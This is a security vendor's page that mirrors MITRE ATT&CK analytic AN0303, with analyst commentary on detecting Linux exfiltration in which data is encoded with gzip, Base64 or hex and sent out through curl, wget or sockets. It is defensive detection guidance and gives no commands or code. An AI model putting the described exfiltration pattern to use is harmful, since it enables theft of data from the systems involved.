Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0303: Analytic 0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

EnterpriseAN0303AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

This analytic describes a Linux exfiltration pattern where a script or process encodes outbound data with gzip, Base64, or hex before sending it out through tools such as curl, wget, or custom sockets. The business significance is that encoding can make data movement look less obvious than plain-text transfer, especially when it comes from processes that are not normally expected to make network connections. For leaders, this is a reminder to validate whether Linux server telemetry can connect process behavior, command-line activity, and outbound network activity during investigations.

Executive priority

Prioritize this as a visibility and response-readiness question for Linux environments that hold sensitive data or support critical operations. Security leaders should ask whether SOC and IR teams can prove what process initiated an outbound connection, whether data was transformed before transfer, and whether outbound traffic from unusual Linux processes is monitored. Because MITRE provides no detection logic for this analytic, organizations should treat it as a control-validation opportunity rather than an out-of-the-box detection guarantee.

Technical view

For SOC and detection teams, the useful validation point is correlation: encoded or compressed data handling by a Linux process followed by outbound transfer through curl, wget, or custom socket activity, especially from non-network daemons. Since no ATT&CK detection text or relationships are supplied, detection engineering should focus on local baselining of expected Linux process-to-network behavior, command-line visibility where available, and alert tuning around unusual outbound connections from processes that do not normally communicate externally.

Likely telemetry

  • Linux process creation and command-line telemetry
  • Parent-child process relationships
  • Outbound network connection metadata from Linux hosts
  • Use of curl, wget, or similar outbound transfer utilities
  • Evidence of gzip, Base64, or hex encoding activity in scripts or process arguments where collected

Detection direction

  • Validate that Linux telemetry can associate outbound connections with the originating process and user context.
  • Baseline expected use of curl, wget, compression, and encoding utilities to reduce false positives from legitimate administration or automation.
  • Prioritize investigation of outbound network activity from processes or daemons that are not normally network-facing.
  • Tune detections carefully because gzip, Base64, hex encoding, curl, and wget can all be legitimate in Linux operations.
  • Because MITRE provides no official detection logic for this analytic, test candidate detections against local Linux workloads before relying on them operationally.

Mitigation priorities

  • Restrict and monitor outbound network access from Linux systems based on business need.
  • Harden service accounts and daemon execution contexts so unexpected scripting and outbound communication are easier to identify and contain.
  • Ensure logging or endpoint telemetry captures process, command-line, and network linkage on Linux hosts that handle sensitive data.
  • Review legitimate automation that uses curl, wget, compression, or encoding so defenders can distinguish expected activity from suspicious behavior.
  • Include this pattern in incident response playbooks for suspected data exfiltration from Linux systems.
Analyst notes and limits

The object is a detection analytic for Linux only. It describes encoded outbound traffic prior to exfiltration using common utilities or custom sockets, with emphasis on activity from non-network daemons. No ATT&CK tactics, relationships, aliases, or official detection procedure were supplied, so the take focuses on defensive validation rather than specific rule logic.

This summary is limited to the supplied STIX fields and external reference. There is no provided detection pseudocode, no linked technique relationship, no threat actor or campaign context, and no evidence of active exploitation. Local asset criticality, normal Linux administration patterns, and available telemetry determine practical priority and detection feasibility.

Official MITRE ATT&CK definition

Analytic 0303

Custom scripts or processes encode outbound traffic using gzip, Base64, or hex prior to exfiltration via curl, wget, or custom sockets. Encoding typically occurs before or during outbound connections from non-network daemons.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
6ef33787e7ab65bf...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 6ef33787e7ab…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0303
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use